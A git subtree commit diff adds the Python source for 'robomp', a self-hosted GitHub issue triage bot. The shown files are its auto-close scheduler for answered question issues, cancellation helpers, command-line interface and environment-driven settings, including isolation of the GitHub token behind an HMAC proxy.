Add 'python/robomp/' from commit '553fd1cfcf59e4c501c54fc81bc083ffd2ca007b'
git-subtree-dir: python/robomp git-subtree-mainline:4f6e70f779git-subtree-split:553fd1cfcf
This commit is contained in:
@@ -0,0 +1,3 @@
|
||||
"""roboomp — self-hosted GitHub triage/fix bot driving omp --mode rpc."""
|
||||
|
||||
__version__ = "0.1.0"
|
||||
@@ -0,0 +1,4 @@
|
||||
from robomp.cli import main
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,194 @@
|
||||
"""Background scheduler that closes question issues after a quiet window.
|
||||
|
||||
Driven entirely by rows in `pending_closures`:
|
||||
- `_build_post_comment` inserts a row when the bot answers a `question` issue.
|
||||
- The webhook handler cancels the row when the original author replies, the
|
||||
issue is closed externally, or any other event signals the human is still
|
||||
engaged.
|
||||
- This loop atomically claims due rows, checks for a 👎 from the issue's
|
||||
original author on the watched comment, and either cancels (author voted
|
||||
down) or closes the issue with `state_reason=completed`.
|
||||
|
||||
The loop is the only writer of terminal `closed`/`cancelled` states for rows
|
||||
it has claimed, so the cancellation hook + the scheduler never race on the
|
||||
same row.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from robomp.config import Settings
|
||||
from robomp.db import Database, PendingClosureRow
|
||||
from robomp.github_backend import GitHubBackend
|
||||
from robomp.github_client import GitHubError
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def _utcnow_iso() -> str:
|
||||
return datetime.now(UTC).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
|
||||
|
||||
|
||||
class AutocloseScheduler:
|
||||
"""Long-lived coroutine that closes due `pending_closures` rows.
|
||||
|
||||
Design choices:
|
||||
- One DB claim per tick (atomic `pending -> claimed`) prevents two
|
||||
ticks from acting on the same row, even if a previous tick was
|
||||
interrupted.
|
||||
- GitHub calls happen sequentially per tick. Auto-close volume is bounded
|
||||
by question-issue volume; concurrency would buy nothing here.
|
||||
- A failed close requeues the row to `pending` so the next tick retries.
|
||||
- 404 on close (issue already gone) finalizes as `cancelled` with reason
|
||||
`already_closed` rather than retrying forever.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
) -> None:
|
||||
self._settings = settings
|
||||
self._db = db
|
||||
self._github = github
|
||||
self._task: asyncio.Task[None] | None = None
|
||||
self._stop_event: asyncio.Event | None = None
|
||||
|
||||
@property
|
||||
def enabled(self) -> bool:
|
||||
return (
|
||||
self._settings.question_autoclose_enabled
|
||||
and self._settings.question_autoclose_hours > 0
|
||||
and self._settings.question_autoclose_scan_seconds > 0
|
||||
)
|
||||
|
||||
async def start(self) -> None:
|
||||
"""Spawn the background loop. No-op when the feature is disabled."""
|
||||
if not self.enabled:
|
||||
log.info(
|
||||
"autoclose disabled",
|
||||
extra={
|
||||
"enabled": self._settings.question_autoclose_enabled,
|
||||
"hours": self._settings.question_autoclose_hours,
|
||||
},
|
||||
)
|
||||
return
|
||||
if self._task is not None:
|
||||
return
|
||||
self._stop_event = asyncio.Event()
|
||||
self._task = asyncio.create_task(self._run(), name="autoclose-scheduler")
|
||||
log.info(
|
||||
"autoclose started",
|
||||
extra={
|
||||
"scan_seconds": self._settings.question_autoclose_scan_seconds,
|
||||
"hours": self._settings.question_autoclose_hours,
|
||||
},
|
||||
)
|
||||
|
||||
async def stop(self) -> None:
|
||||
"""Signal the loop to exit and await its termination."""
|
||||
if self._task is None:
|
||||
return
|
||||
assert self._stop_event is not None
|
||||
self._stop_event.set()
|
||||
try:
|
||||
await asyncio.wait_for(self._task, timeout=5.0)
|
||||
except TimeoutError:
|
||||
self._task.cancel()
|
||||
try:
|
||||
await self._task
|
||||
except (asyncio.CancelledError, Exception):
|
||||
pass
|
||||
finally:
|
||||
self._task = None
|
||||
self._stop_event = None
|
||||
|
||||
async def _run(self) -> None:
|
||||
assert self._stop_event is not None
|
||||
scan_seconds = float(self._settings.question_autoclose_scan_seconds)
|
||||
while not self._stop_event.is_set():
|
||||
try:
|
||||
await self.tick()
|
||||
except Exception:
|
||||
log.exception("autoclose tick failed")
|
||||
try:
|
||||
await asyncio.wait_for(self._stop_event.wait(), timeout=scan_seconds)
|
||||
except TimeoutError:
|
||||
continue
|
||||
|
||||
async def tick(self) -> dict[str, int]:
|
||||
"""Process all due rows. Exposed for tests.
|
||||
|
||||
Returns a counter dict (`closed`, `cancelled`, `retried`) summarizing
|
||||
what happened on this tick.
|
||||
"""
|
||||
rows = self._db.claim_due_closures(now=_utcnow_iso())
|
||||
counts = {"closed": 0, "cancelled": 0, "retried": 0}
|
||||
for row in rows:
|
||||
outcome = await self._process_row(row)
|
||||
counts[outcome] = counts.get(outcome, 0) + 1
|
||||
if rows:
|
||||
log.info(
|
||||
"autoclose tick",
|
||||
extra={
|
||||
"closed": counts["closed"],
|
||||
"cancelled": counts["cancelled"],
|
||||
"retried": counts["retried"],
|
||||
"total": len(rows),
|
||||
},
|
||||
)
|
||||
return counts
|
||||
|
||||
async def _process_row(self, row: PendingClosureRow) -> str:
|
||||
"""Resolve a single claimed row. Returns `closed`/`cancelled`/`retried`."""
|
||||
try:
|
||||
reactions = await self._github.list_comment_reactions(row.repo, row.comment_id)
|
||||
except GitHubError as exc:
|
||||
log.warning(
|
||||
"autoclose: list_comment_reactions failed; will retry",
|
||||
extra={"issue_key": row.issue_key, "status": exc.status, "gh_message": exc.message},
|
||||
)
|
||||
self._db.requeue_claimed_closure(row.issue_key)
|
||||
return "retried"
|
||||
|
||||
author = row.issue_author.lower()
|
||||
author_downvoted = any(r.content == "-1" and r.user_login.lower() == author for r in reactions)
|
||||
if author_downvoted:
|
||||
self._db.finalize_closure(row.issue_key, state="cancelled", reason="author_downvoted")
|
||||
log.info(
|
||||
"autoclose cancelled by author 👎",
|
||||
extra={"issue_key": row.issue_key, "comment_id": row.comment_id},
|
||||
)
|
||||
return "cancelled"
|
||||
|
||||
try:
|
||||
await self._github.close_issue(row.repo, row.number, reason="completed")
|
||||
except GitHubError as exc:
|
||||
if exc.status == 404:
|
||||
self._db.finalize_closure(row.issue_key, state="cancelled", reason="already_closed")
|
||||
log.info(
|
||||
"autoclose: issue already gone",
|
||||
extra={"issue_key": row.issue_key},
|
||||
)
|
||||
return "cancelled"
|
||||
log.warning(
|
||||
"autoclose: close_issue failed; will retry",
|
||||
extra={"issue_key": row.issue_key, "status": exc.status, "gh_message": exc.message},
|
||||
)
|
||||
self._db.requeue_claimed_closure(row.issue_key)
|
||||
return "retried"
|
||||
|
||||
self._db.finalize_closure(row.issue_key, state="closed", reason=None)
|
||||
log.info(
|
||||
"autoclose closed issue",
|
||||
extra={"issue_key": row.issue_key, "number": row.number},
|
||||
)
|
||||
return "closed"
|
||||
|
||||
|
||||
__all__ = ["AutocloseScheduler"]
|
||||
@@ -0,0 +1,73 @@
|
||||
"""Per-event cancellation primitives shared by `WorkerPool` and the workers.
|
||||
|
||||
The dispatcher sets `_current_event` to `(pool, delivery_id)` for the lifetime
|
||||
of a single event. Worker threads call `register_cancel_hook` / `unregister_cancel_hook`
|
||||
from inside that scope to attach a stop callable the pool can fire on demand.
|
||||
The contextvar propagates through `asyncio.to_thread` automatically because
|
||||
`asyncio` copies the current context into the executed coroutine context.
|
||||
|
||||
Kept in its own module so `worker.py` doesn't have to import `queue.py` (the
|
||||
dispatcher already imports `tasks`, which imports `worker` — a cycle).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import contextvars
|
||||
import logging
|
||||
from collections.abc import Callable
|
||||
from typing import Protocol
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class _CancelSink(Protocol):
|
||||
"""Just the slice of `WorkerPool` the helpers below depend on."""
|
||||
|
||||
def _arm_cancel(self, delivery_id: str, hook: Callable[[], None]) -> None: ...
|
||||
def _disarm_cancel(self, delivery_id: str) -> None: ...
|
||||
|
||||
|
||||
_current_event: contextvars.ContextVar[tuple[_CancelSink, str] | None] = contextvars.ContextVar(
|
||||
"robomp_current_event", default=None
|
||||
)
|
||||
|
||||
|
||||
def set_current_event(sink: _CancelSink, delivery_id: str) -> contextvars.Token:
|
||||
"""Open a per-event cancellation scope; returns a reset token for the caller."""
|
||||
return _current_event.set((sink, delivery_id))
|
||||
|
||||
|
||||
def clear_current_event(token: contextvars.Token) -> None:
|
||||
"""Close the scope opened by `set_current_event`."""
|
||||
_current_event.reset(token)
|
||||
|
||||
|
||||
def register_cancel_hook(hook: Callable[[], None]) -> None:
|
||||
"""Arm cancellation for the event currently running on this thread.
|
||||
|
||||
Called from the worker thread once it owns a resource that can be safely
|
||||
torn down from outside (e.g. an `RpcClient` whose `.stop()` kills the
|
||||
subprocess). Safe to call when no event context is active — no-ops.
|
||||
"""
|
||||
ctx = _current_event.get()
|
||||
if ctx is None:
|
||||
return
|
||||
sink, delivery_id = ctx
|
||||
sink._arm_cancel(delivery_id, hook)
|
||||
|
||||
|
||||
def unregister_cancel_hook() -> None:
|
||||
"""Disarm cancellation for the current event. Idempotent."""
|
||||
ctx = _current_event.get()
|
||||
if ctx is None:
|
||||
return
|
||||
sink, delivery_id = ctx
|
||||
sink._disarm_cancel(delivery_id)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"clear_current_event",
|
||||
"register_cancel_hook",
|
||||
"set_current_event",
|
||||
"unregister_cancel_hook",
|
||||
]
|
||||
@@ -0,0 +1,223 @@
|
||||
"""Command-line interface."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import sys
|
||||
|
||||
import click
|
||||
import uvicorn
|
||||
|
||||
from robomp.config import Settings, get_settings
|
||||
from robomp.db import INACTIVE_EVENT_STATES, get_database
|
||||
from robomp.logging_config import configure_logging
|
||||
from robomp.manual_triage import (
|
||||
InvalidIssueRef,
|
||||
ManualTriageError,
|
||||
ManualTriageTimeout,
|
||||
await_terminal_state,
|
||||
enqueue_manual_triage,
|
||||
parse_issue_ref,
|
||||
)
|
||||
from robomp.proxy_client import GitHubProxyClient
|
||||
from robomp.sandbox import SandboxManager
|
||||
from robomp.server import create_app
|
||||
|
||||
|
||||
def _settings_or_die() -> Settings:
|
||||
try:
|
||||
return get_settings()
|
||||
except Exception as exc:
|
||||
click.echo(f"configuration error: {exc}", err=True)
|
||||
sys.exit(2)
|
||||
|
||||
|
||||
def _require_proxy_mode(cfg: Settings) -> tuple[str, bytes]:
|
||||
if cfg.github_token is not None:
|
||||
raise SystemExit(
|
||||
"robomp orchestrator refuses to start with GITHUB_TOKEN set in env. "
|
||||
"The PAT must live only in the gh-proxy container."
|
||||
)
|
||||
if cfg.gh_proxy_url is None or cfg.gh_proxy_hmac_key is None:
|
||||
raise SystemExit(
|
||||
"robomp orchestrator requires ROBOMP_GH_PROXY_URL and "
|
||||
"ROBOMP_GH_PROXY_HMAC_KEY (run gh-proxy in a sibling container)."
|
||||
)
|
||||
return cfg.gh_proxy_url, cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8")
|
||||
|
||||
|
||||
def _build_github(cfg: Settings) -> GitHubProxyClient:
|
||||
base_url, key = _require_proxy_mode(cfg)
|
||||
return GitHubProxyClient(base_url=base_url, hmac_key=key)
|
||||
|
||||
|
||||
def _default_wait_timeout(cfg: Settings) -> float:
|
||||
return cfg.task_timeout_seconds + cfg.task_timeout_hard_grace_seconds + 30.0
|
||||
|
||||
|
||||
@click.group()
|
||||
def main() -> None:
|
||||
"""roboomp control surface."""
|
||||
|
||||
|
||||
@main.command()
|
||||
def serve() -> None:
|
||||
"""Run the webhook receiver + worker pool."""
|
||||
cfg = _settings_or_die()
|
||||
configure_logging(cfg.log_dir)
|
||||
cfg.ensure_paths()
|
||||
app = create_app(cfg)
|
||||
uvicorn.run(app, host=cfg.bind_host, port=cfg.bind_port, log_config=None)
|
||||
|
||||
|
||||
@main.command()
|
||||
@click.argument("issue_ref")
|
||||
@click.option(
|
||||
"--wait-timeout",
|
||||
type=click.FloatRange(min=0.1),
|
||||
default=None,
|
||||
help="Seconds to wait for a terminal state before returning non-zero (default: task timeout + hard grace + 30).",
|
||||
)
|
||||
def triage(issue_ref: str, wait_timeout: float | None) -> None:
|
||||
"""Fetch a live issue and queue it as if a webhook arrived.
|
||||
|
||||
ISSUE_REF is `owner/repo#NN`.
|
||||
"""
|
||||
cfg = _settings_or_die()
|
||||
configure_logging(cfg.log_dir)
|
||||
cfg.ensure_paths()
|
||||
try:
|
||||
repo_full, number = parse_issue_ref(issue_ref)
|
||||
except InvalidIssueRef as exc:
|
||||
click.echo(str(exc), err=True)
|
||||
sys.exit(2)
|
||||
if not cfg.allows(repo_full):
|
||||
click.echo(f"refusing: {repo_full} not in ROBOMP_REPO_ALLOWLIST", err=True)
|
||||
sys.exit(2)
|
||||
|
||||
async def _go() -> None:
|
||||
github = _build_github(cfg)
|
||||
db = get_database(cfg.sqlite_path)
|
||||
try:
|
||||
delivery = await enqueue_manual_triage(
|
||||
db=db,
|
||||
github=github,
|
||||
repo_full=repo_full,
|
||||
number=number,
|
||||
)
|
||||
except ManualTriageError as exc:
|
||||
click.echo(f"refusing: {exc}", err=True)
|
||||
sys.exit(2)
|
||||
# The dispatcher loop lives in the long-running `serve` process; we
|
||||
# only watch the row land in a terminal state. Wake latency is
|
||||
# bounded by `WorkerPool._dispatch_loop`'s 10s `_wakeup.wait()` fallback.
|
||||
click.echo(json.dumps({"delivery": delivery, "state": "queued"}, indent=2))
|
||||
timeout = wait_timeout if wait_timeout is not None else _default_wait_timeout(cfg)
|
||||
try:
|
||||
final = await await_terminal_state(db, delivery, timeout=timeout)
|
||||
except ManualTriageTimeout as exc:
|
||||
click.echo(
|
||||
json.dumps(
|
||||
{"delivery": delivery, "state": exc.state, "timed_out": True, "error": str(exc)},
|
||||
indent=2,
|
||||
),
|
||||
err=True,
|
||||
)
|
||||
sys.exit(1)
|
||||
if final is None:
|
||||
click.echo(json.dumps({"delivery": delivery, "state": "missing"}, indent=2))
|
||||
return
|
||||
click.echo(
|
||||
json.dumps(
|
||||
{"delivery": delivery, "state": final.state, "error": final.last_error},
|
||||
indent=2,
|
||||
)
|
||||
)
|
||||
|
||||
asyncio.run(_go())
|
||||
|
||||
|
||||
@main.command()
|
||||
@click.argument("delivery_id")
|
||||
@click.option(
|
||||
"--wait-timeout",
|
||||
type=click.FloatRange(min=0.1),
|
||||
default=None,
|
||||
help="Seconds to wait for a terminal state before returning non-zero (default: task timeout + hard grace + 30).",
|
||||
)
|
||||
def replay(delivery_id: str, wait_timeout: float | None) -> None:
|
||||
"""Re-enqueue a stored event so the running `serve` pool can pick it up."""
|
||||
cfg = _settings_or_die()
|
||||
configure_logging(cfg.log_dir)
|
||||
cfg.ensure_paths()
|
||||
db = get_database(cfg.sqlite_path)
|
||||
row = db.get_event(delivery_id)
|
||||
if row is None:
|
||||
click.echo(f"unknown delivery: {delivery_id}", err=True)
|
||||
sys.exit(2)
|
||||
if not db.requeue_event(delivery_id, from_states=INACTIVE_EVENT_STATES):
|
||||
click.echo(
|
||||
f"delivery {delivery_id} is {row.state}; only inactive events can be replayed",
|
||||
err=True,
|
||||
)
|
||||
sys.exit(2)
|
||||
|
||||
async def _wait() -> None:
|
||||
timeout = wait_timeout if wait_timeout is not None else _default_wait_timeout(cfg)
|
||||
try:
|
||||
final = await await_terminal_state(db, delivery_id, timeout=timeout)
|
||||
except ManualTriageTimeout as exc:
|
||||
click.echo(
|
||||
json.dumps(
|
||||
{"delivery": delivery_id, "state": exc.state, "timed_out": True, "error": str(exc)},
|
||||
indent=2,
|
||||
),
|
||||
err=True,
|
||||
)
|
||||
sys.exit(1)
|
||||
if final is None:
|
||||
click.echo(json.dumps({"delivery": delivery_id, "state": "missing"}, indent=2))
|
||||
return
|
||||
click.echo(
|
||||
json.dumps(
|
||||
{"delivery": delivery_id, "state": final.state, "error": final.last_error},
|
||||
indent=2,
|
||||
)
|
||||
)
|
||||
|
||||
asyncio.run(_wait())
|
||||
|
||||
|
||||
@main.command()
|
||||
def status() -> None:
|
||||
"""Dump the issue table."""
|
||||
cfg = _settings_or_die()
|
||||
cfg.ensure_paths()
|
||||
db = get_database(cfg.sqlite_path)
|
||||
rows = db.list_issues()
|
||||
for r in rows:
|
||||
click.echo(
|
||||
f"{r.key:<40} state={r.state:<12} pr={r.pr_number or '-'} branch={r.branch or '-'} updated={r.updated_at}"
|
||||
)
|
||||
|
||||
|
||||
@main.command()
|
||||
@click.argument("issue_key")
|
||||
def cleanup(issue_key: str) -> None:
|
||||
"""Force-remove the workspace for an issue (does not touch the remote)."""
|
||||
cfg = _settings_or_die()
|
||||
cfg.ensure_paths()
|
||||
db = get_database(cfg.sqlite_path)
|
||||
row = db.get_issue(issue_key)
|
||||
if row is None:
|
||||
click.echo(f"unknown issue: {issue_key}", err=True)
|
||||
sys.exit(2)
|
||||
sandbox = SandboxManager(cfg.workspace_root)
|
||||
sandbox.remove_workspace(repo=row.repo, number=row.number)
|
||||
db.set_issue_state(issue_key, "abandoned")
|
||||
click.echo(f"cleaned up {issue_key}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,381 @@
|
||||
"""Env-driven configuration for roboomp."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import random
|
||||
from functools import cache
|
||||
from pathlib import Path
|
||||
from typing import Literal
|
||||
|
||||
from pydantic import Field, SecretStr, field_validator, model_validator
|
||||
from pydantic_settings import BaseSettings, SettingsConfigDict
|
||||
|
||||
ThinkingLevel = Literal["off", "low", "medium", "high", "xhigh"]
|
||||
|
||||
|
||||
class Settings(BaseSettings):
|
||||
"""Strongly-typed runtime configuration.
|
||||
|
||||
Loaded from process env, optionally pre-populated by `.env`.
|
||||
"""
|
||||
|
||||
model_config = SettingsConfigDict(
|
||||
env_file=".env",
|
||||
env_file_encoding="utf-8",
|
||||
extra="ignore",
|
||||
case_sensitive=False,
|
||||
)
|
||||
|
||||
# GitHub
|
||||
# `github_token` is REQUIRED on the gh-proxy side (it holds the PAT) and
|
||||
# OPTIONAL on the orchestrator side when `gh_proxy_url` is configured —
|
||||
# the orchestrator then talks to gh-proxy over HMAC RPC and never sees
|
||||
# the PAT. Validated end-to-end in `_validate_proxy_or_pat` below.
|
||||
github_token: SecretStr | None = Field(None, alias="GITHUB_TOKEN")
|
||||
github_webhook_secret: SecretStr = Field(..., alias="GITHUB_WEBHOOK_SECRET")
|
||||
bot_login: str = Field(..., alias="ROBOMP_BOT_LOGIN")
|
||||
git_author_name: str | None = Field(None, alias="ROBOMP_GIT_AUTHOR_NAME")
|
||||
git_author_email: str = Field(..., alias="ROBOMP_GIT_AUTHOR_EMAIL")
|
||||
repo_allowlist_raw: str = Field("", alias="ROBOMP_REPO_ALLOWLIST")
|
||||
|
||||
# gh-proxy. Set BOTH to route GitHub through the proxy; leave both empty
|
||||
# to keep PAT-on-orchestrator behavior. Mixing the two (PAT + proxy) is
|
||||
# rejected to prevent silent fallback to direct GitHub access.
|
||||
gh_proxy_url: str | None = Field(None, alias="ROBOMP_GH_PROXY_URL")
|
||||
gh_proxy_hmac_key: SecretStr | None = Field(None, alias="ROBOMP_GH_PROXY_HMAC_KEY")
|
||||
# Bind address for `python -m robomp.proxy serve`. Internal-only by
|
||||
# default; gh-proxy never exposes a host port.
|
||||
gh_proxy_bind_host: str = Field("0.0.0.0", alias="ROBOMP_GH_PROXY_BIND_HOST")
|
||||
gh_proxy_bind_port: int = Field(8081, alias="ROBOMP_GH_PROXY_BIND_PORT")
|
||||
|
||||
# gh-proxy: maximum request body size (bytes). Bodies larger than this
|
||||
# are rejected with 413 BEFORE the proxy reads them into memory. Tight
|
||||
# by design — every typed endpoint payload fits in a few KB.
|
||||
gh_proxy_max_body_bytes: int = Field(1 << 20, alias="ROBOMP_GH_PROXY_MAX_BODY_BYTES")
|
||||
# Hard wall-clock budget (seconds) for a single git subprocess invoked
|
||||
# by gh-proxy. Bounds how long a hung git can pin a request handler.
|
||||
gh_proxy_git_timeout_seconds: float = Field(60.0, alias="ROBOMP_GH_PROXY_GIT_TIMEOUT_SECONDS")
|
||||
|
||||
# Model selection
|
||||
model: str = Field("p-anthropic/claude-sonnet-4-6", alias="ROBOMP_MODEL")
|
||||
provider: str | None = Field(None, alias="ROBOMP_PROVIDER")
|
||||
thinking_level: ThinkingLevel = Field("high", alias="ROBOMP_THINKING")
|
||||
|
||||
# Runtime
|
||||
max_concurrency: int = Field(8, alias="ROBOMP_MAX_CONCURRENCY")
|
||||
task_timeout_seconds: float = Field(2400.0, alias="ROBOMP_TASK_TIMEOUT_SECONDS")
|
||||
task_timeout_hard_grace_seconds: float = Field(60.0, alias="ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS")
|
||||
request_timeout_seconds: float = Field(120.0, alias="ROBOMP_REQUEST_TIMEOUT_SECONDS")
|
||||
# Premature-end reminder. When a `triage_issue` turn ends without the
|
||||
# agent having reached a terminal tool (`gh_open_pr`,
|
||||
# `mark_unable_to_reproduce`, `abort_task`) for a `bug`/`documentation`
|
||||
# classification, the driver sends up to this many "you stopped before
|
||||
# opening a PR — continue" reminder prompts into the same omp session.
|
||||
# Set to 0 to disable.
|
||||
task_completion_max_reminders: int = Field(2, alias="ROBOMP_TASK_COMPLETION_MAX_REMINDERS")
|
||||
omp_command: str = Field("omp", alias="ROBOMP_OMP_COMMAND")
|
||||
|
||||
# Graceful shutdown (Phase B). On SIGTERM the dispatcher stops claiming
|
||||
# new work, then waits up to `drain` seconds for in-flight events to
|
||||
# complete cleanly; any still running after that get their omp
|
||||
# subprocess killed and the row left in `running` so it requeues on
|
||||
# next start. Sum of both MUST stay below the compose `stop_grace_period`.
|
||||
shutdown_drain_timeout_seconds: float = Field(25.0, alias="ROBOMP_SHUTDOWN_DRAIN_TIMEOUT_SECONDS")
|
||||
shutdown_kill_timeout_seconds: float = Field(5.0, alias="ROBOMP_SHUTDOWN_KILL_TIMEOUT_SECONDS")
|
||||
|
||||
# Paths
|
||||
workspace_root: Path = Field(Path("./data/workspaces"), alias="ROBOMP_WORKSPACE_ROOT")
|
||||
sqlite_path: Path = Field(Path("./data/robomp.sqlite"), alias="ROBOMP_SQLITE_PATH")
|
||||
log_dir: Path = Field(Path("./data/logs"), alias="ROBOMP_LOG_DIR")
|
||||
|
||||
# Server
|
||||
bind_host: str = Field("0.0.0.0", alias="ROBOMP_BIND_HOST")
|
||||
bind_port: int = Field(8080, alias="ROBOMP_BIND_PORT")
|
||||
|
||||
# Dev-only replay header value; if empty, /replay is disabled
|
||||
replay_token: SecretStr | None = Field(None, alias="ROBOMP_REPLAY_TOKEN")
|
||||
|
||||
# Per-submitter rate limiting. `window_seconds` defines the rolling window;
|
||||
# `default` is the per-window cap for unknown/first-time submitters;
|
||||
# `contributor` is the cap for accounts whose GitHub author_association is
|
||||
# `CONTRIBUTOR` (i.e. already has a merged PR). `unlimited_raw` is a
|
||||
# comma-separated allowlist of logins that bypass the limiter entirely;
|
||||
# accounts with author_association OWNER/MEMBER/COLLABORATOR also bypass.
|
||||
rate_limit_window_seconds: float = Field(3600.0, alias="ROBOMP_RATE_LIMIT_WINDOW_SECONDS")
|
||||
rate_limit_default: int = Field(3, alias="ROBOMP_RATE_LIMIT_DEFAULT")
|
||||
rate_limit_contributor: int = Field(10, alias="ROBOMP_RATE_LIMIT_CONTRIBUTOR")
|
||||
rate_limit_unlimited_raw: str = Field("", alias="ROBOMP_RATE_LIMIT_UNLIMITED")
|
||||
# Logins (comma-separated, `@` prefix optional) whose `@bot_login`
|
||||
# mentions are treated as authoritative directives. These accounts also
|
||||
# bypass rate limiting regardless of `author_association`.
|
||||
maintainer_logins_raw: str = Field("", alias="ROBOMP_MAINTAINER_LOGINS")
|
||||
# Bot logins (e.g. chatgpt-codex-connector) whose comments/reviews are
|
||||
# treated as authoritative directives without requiring an `@bot` mention.
|
||||
# Comma-separated; `@` prefix optional.
|
||||
reviewer_bots_raw: str = Field("", alias="ROBOMP_REVIEWER_BOTS")
|
||||
|
||||
# Question auto-close. When the bot answers an issue classified as
|
||||
# `question`, the comment is suffixed with a 👎-to-keep-open prompt and a
|
||||
# row is scheduled in `pending_closures`. The scheduler closes the issue
|
||||
# after `question_autoclose_hours` unless the issue author downvoted the
|
||||
# comment, a human follow-up arrived, or the issue was closed externally.
|
||||
# Set `question_autoclose_enabled=False` (or hours <= 0) to disable.
|
||||
question_autoclose_enabled: bool = Field(True, alias="ROBOMP_QUESTION_AUTOCLOSE_ENABLED")
|
||||
question_autoclose_hours: float = Field(4.0, alias="ROBOMP_QUESTION_AUTOCLOSE_HOURS")
|
||||
question_autoclose_scan_seconds: float = Field(60.0, alias="ROBOMP_QUESTION_AUTOCLOSE_SCAN_SECONDS")
|
||||
|
||||
# pi-natives build-output cache. Hardlinks pre-built
|
||||
# `packages/natives/native/*.node` (and its companions) into new
|
||||
# workspaces keyed by the git tree-hashes of inputs that determine the
|
||||
# build output. Misses are captured automatically when a task that
|
||||
# finishes successfully has fresh artifacts. Disable to fall back to
|
||||
# per-workspace builds.
|
||||
natives_cache_enabled: bool = Field(True, alias="ROBOMP_NATIVES_CACHE_ENABLED")
|
||||
natives_cache_root: Path = Field(Path("/data/cache/pi-natives"), alias="ROBOMP_NATIVES_CACHE_ROOT")
|
||||
natives_cache_max_entries_per_repo: int = Field(8, alias="ROBOMP_NATIVES_CACHE_MAX_ENTRIES_PER_REPO")
|
||||
natives_cache_max_bytes: int = Field(4 * 1024**3, alias="ROBOMP_NATIVES_CACHE_MAX_BYTES")
|
||||
natives_cache_gc_interval_seconds: float = Field(3600.0, alias="ROBOMP_NATIVES_CACHE_GC_INTERVAL_SECONDS")
|
||||
|
||||
@field_validator("bot_login", mode="after")
|
||||
@classmethod
|
||||
def _require_bot_login(cls, value: str) -> str:
|
||||
cleaned = value.strip()
|
||||
if not cleaned:
|
||||
raise ValueError("ROBOMP_BOT_LOGIN must be a non-empty GitHub login")
|
||||
return cleaned
|
||||
|
||||
@field_validator("replay_token", mode="before")
|
||||
@classmethod
|
||||
def _blank_replay_disables(cls, value: object) -> object:
|
||||
# Treat empty/whitespace strings as 'disabled'. Without this, an empty
|
||||
# ROBOMP_REPLAY_TOKEN becomes SecretStr("") which the server would
|
||||
# happily compare against an empty X-Robomp-Replay-Token header.
|
||||
if isinstance(value, str) and not value.strip():
|
||||
return None
|
||||
if hasattr(value, "get_secret_value"):
|
||||
inner = value.get_secret_value() # type: ignore[attr-defined]
|
||||
if isinstance(inner, str) and not inner.strip():
|
||||
return None
|
||||
return value
|
||||
|
||||
@field_validator("github_token", mode="before")
|
||||
@classmethod
|
||||
def _blank_token_disables(cls, value: object) -> object:
|
||||
"""Treat empty/whitespace `GITHUB_TOKEN` as 'unset' so proxy-only
|
||||
deployments don't have to remove the env var."""
|
||||
if isinstance(value, str) and not value.strip():
|
||||
return None
|
||||
if hasattr(value, "get_secret_value"):
|
||||
inner = value.get_secret_value() # type: ignore[attr-defined]
|
||||
if isinstance(inner, str) and not inner.strip():
|
||||
return None
|
||||
return value
|
||||
|
||||
@field_validator("gh_proxy_url", mode="before")
|
||||
@classmethod
|
||||
def _blank_proxy_url_disables(cls, value: object) -> object:
|
||||
if isinstance(value, str) and not value.strip():
|
||||
return None
|
||||
return value
|
||||
|
||||
@field_validator("gh_proxy_hmac_key", mode="before")
|
||||
@classmethod
|
||||
def _blank_proxy_key_disables(cls, value: object) -> object:
|
||||
if isinstance(value, str) and not value.strip():
|
||||
return None
|
||||
if hasattr(value, "get_secret_value"):
|
||||
inner = value.get_secret_value() # type: ignore[attr-defined]
|
||||
if isinstance(inner, str) and not inner.strip():
|
||||
return None
|
||||
return value
|
||||
|
||||
@model_validator(mode="after")
|
||||
def _validate_proxy_or_pat(self) -> Settings:
|
||||
"""Enforce mutual exclusion between PAT and proxy mode.
|
||||
|
||||
- Both set → reject (silent fallback to direct GitHub would defeat
|
||||
the isolation goal).
|
||||
- Proxy URL set but no HMAC key (or vice versa) → reject (gh-proxy
|
||||
would either be unauthenticated or unreachable).
|
||||
- Neither set → also reject; SOMETHING needs to talk to GitHub.
|
||||
"""
|
||||
has_token = self.github_token is not None
|
||||
has_url = bool(self.gh_proxy_url)
|
||||
has_key = self.gh_proxy_hmac_key is not None
|
||||
if has_token and has_url:
|
||||
raise ValueError(
|
||||
"GITHUB_TOKEN and ROBOMP_GH_PROXY_URL are mutually exclusive — "
|
||||
"set ONE to choose between direct-PAT and gh-proxy modes."
|
||||
)
|
||||
if has_url != has_key:
|
||||
raise ValueError(
|
||||
"ROBOMP_GH_PROXY_URL and ROBOMP_GH_PROXY_HMAC_KEY must both be set together (or both empty)."
|
||||
)
|
||||
if not has_token and not has_url:
|
||||
raise ValueError(
|
||||
"no GitHub access configured: set GITHUB_TOKEN, or set "
|
||||
"ROBOMP_GH_PROXY_URL + ROBOMP_GH_PROXY_HMAC_KEY to use gh-proxy."
|
||||
)
|
||||
return self
|
||||
|
||||
@field_validator("repo_allowlist_raw", mode="before")
|
||||
@classmethod
|
||||
def _coerce_allowlist(cls, v: object) -> str:
|
||||
if v is None:
|
||||
return ""
|
||||
if isinstance(v, str):
|
||||
return v
|
||||
if isinstance(v, (list, tuple)):
|
||||
return ",".join(str(item) for item in v)
|
||||
return str(v)
|
||||
|
||||
@property
|
||||
def repo_allowlist(self) -> frozenset[str]:
|
||||
items = [piece.strip().lower() for piece in self.repo_allowlist_raw.split(",")]
|
||||
return frozenset(item for item in items if item)
|
||||
|
||||
